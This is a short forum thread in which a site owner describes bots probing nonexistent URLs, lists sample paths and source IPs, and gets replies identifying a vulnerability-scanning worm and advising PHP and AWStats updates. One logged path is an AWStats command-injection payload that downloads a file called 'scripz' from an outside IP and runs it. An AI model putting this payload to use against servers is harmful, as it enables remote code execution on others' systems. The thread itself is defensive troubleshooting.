One of our other site is visited by mysterious robots everyday from different ips. They would visit nonexistent links. We would block the ip whenever the logs shows a 404 error. But it seems they own endless number of ips and would visit a few times a day on a different ip. Each visit would generate 10 to 20 404-errors. Do you know who these are, and how to effectively prevent? Sample visited nonexistent link: /xmlsrv/xmlrpc.php /blogs/xmlsrv/xmlrpc.php /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| list of some of the ips: 219.238.185.149 69.60.121.159 59.37.75.4 202.216.111.226 216.158.131.2 210.97.228.85 64.251.30.6 213.19.128.225 200.169.164.242 221.151.178.20 200.169.164.242 62.69.122.233 12.36.175.159 220.135.88.151
When you look at your awstats info are you seeing lots of referrer spam? They may be probing for vulnerabilities. Shannon
See this thread started by SEbasic. This is some sort of worm or script probing for vulnerabilities. Ensure that you have the latest versions of PHP and AWSTATS, assuming your server uses those, and make sure that register_globals is disabled (see poast by Shawn in that thread for how to do it at the site level using .htaccess if it isn't disabled at the server level).